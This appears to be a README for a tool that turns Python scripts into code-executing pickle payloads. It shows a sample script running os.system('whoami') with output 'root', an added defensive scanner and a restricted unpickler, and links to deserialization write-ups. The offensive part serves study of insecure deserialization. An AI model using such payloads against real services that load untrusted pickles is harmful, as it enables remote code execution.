An arbitrary Python code executor via Python pickle
# cat evil.py
#!/usr/bin/env python
# encoding:utf-8
class Exploit():
    def __init__(self, command):
        self.command = command

    def run(self):
        import os
        return os.system(self.command)

print(Exploit("whoami").run())
# python pickle-pickle.py
Usage:
python ./pickle-pickle.py [FILENAME]
# python pickle-pickle.py evil.py
root
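From the receiving side, a pickle that runs code on load can be recognised without loading it, because it has to import a callable and then invoke it. The following is an added example, not part of pickle-pickle: the names `scan`, `DataOnlyUnpickler` and `safe_loads` are hypothetical, and the sample stream is constructed with the harmless `platform.node` standing in for whatever a converter would embed.

```python
import io
import pickle
import pickletools
import platform

class Sample:
    # Constructed sample: on load, the stream imports a callable and calls it.
    def __reduce__(self):
        return (platform.node, ())

SAMPLE = pickle.dumps(Sample(), protocol=4)
BENIGN = pickle.dumps({"user": "alice", "roles": ["dev"]}, protocol=4)

# Opcodes that make the unpickler call something it imported.
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def scan(data):
    """List imports and call opcodes in a pickle stream without loading it."""
    imports, calls, strings = [], [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            # Text opcodes carry "module name" as one space-separated argument.
            imports.append(arg.replace(" ", ".", 1))
        elif op.name == "STACK_GLOBAL":
            # Heuristic: module and name are the two most recent strings pushed.
            imports.append(".".join(strings[-2:]))
        elif isinstance(arg, str):
            strings.append(arg)
        if op.name in CALL_OPS:
            calls.append(op.name)
    return imports, calls

class DataOnlyUnpickler(pickle.Unpickler):
    """Refuse every import, so only plain containers and scalars can load."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"import of {module}.{name} refused")

def safe_loads(data):
    return DataOnlyUnpickler(io.BytesIO(data)).load()

if __name__ == "__main__":
    print(scan(SAMPLE))   # imports and call opcodes found in the sample
    print(scan(BENIGN), safe_loads(BENIGN))
```

The scan is a triage aid only; the `find_class` override is what actually stops an import at load time.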
- Only tested on Python 3.7.4
- Source Code
- Documents
- CTF WriteUP
- Articles
  - https://checkoway.net/musings/pickle/
  - https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html
  - https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.html
  - https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html
  - https://zhuanlan.zhihu.com/p/25981037
  - http://www.bendawang.site/2018/04/18/Python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E8%8A%B1%E5%BC%8F%E5%88%A9%E7%94%A8/
  - http://intx0x80.blogspot.com/2017/05/python-input-vulnerability_25.html
- Papers
- Tools